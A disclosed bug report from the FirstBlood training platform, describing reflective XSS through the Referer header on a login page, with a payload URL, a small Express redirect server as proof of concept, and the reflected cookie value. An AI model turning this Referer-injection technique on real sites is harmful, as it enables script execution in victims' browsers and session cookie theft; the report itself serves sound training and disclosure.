FirstBlood-#583 — Reflective XSS via Referer on login.php endpoint
This issue was discovered on FirstBlood v2
On 2021-10-26, panya 
Level 7
reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
The site contains is vulnerable to Reflective XSS on the /login.php endpoint. It reflects the Referer header value inside the "Return to previous page" link's href (in single quotes).
Steps to reproduce:
- Open this url http://ztn.me/test'onclick=alert(document.cookie);return(false)//
It is hosted on my server:
const express = require('express');
const app = express();
app.get('*', (req, res) => {
res.set('Referrer-Policy', 'unsafe-url');
res.set('Content-Type', 'text/html');
res.end('<script>location.replace("https://fcde991cdbc2-panya.a.firstbloodhackers.com/login.php");</script>');
});
app.listen(80);
- The browser will redirect you to https://fcde991cdbc2-panya.a.firstbloodhackers.com/login.php
- Click on the "Return to previous page" link.
Actual result:
There will be an alert with the user's document.cookie value (doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9 in our case).
Expected result:
The Referer header's value should be properly escaped or sanitized. The alert should not be shown.
Impact:
An attacker could execute JS code on behalf of a user of this site.
P3 Medium
Endpoint: /login.php
Parameter: Referer:
Payload: http://ztn.me/test'onclick=alert(document.cookie);return(false)//
FirstBlood ID: 19
Vulnerability Type: Reflective XSS
The parameter ?ref= on login.php was fixed and instead the use of $_SERVER['HTTP_REFERER']; was used. Patrice tested in Chrome and Firefox and saw it was secure, but some users still use Internet Explorer 10 (governments for example!) and the Referer header is vulnerable to reflective XSS.
Report Feedback
Creator & Administrator
Nice panya! Fun fact, Even though the referrer is vulnerable, on a lot of the reports for this the payload provided simply wouldn't work (use of < > etc). So kudos for providing a working PoC. Actually for me when testing it would only work on IE as it seems for me on latest version of Chrome/FF the ' character is now filtered. I'll play some more though and may update this bug description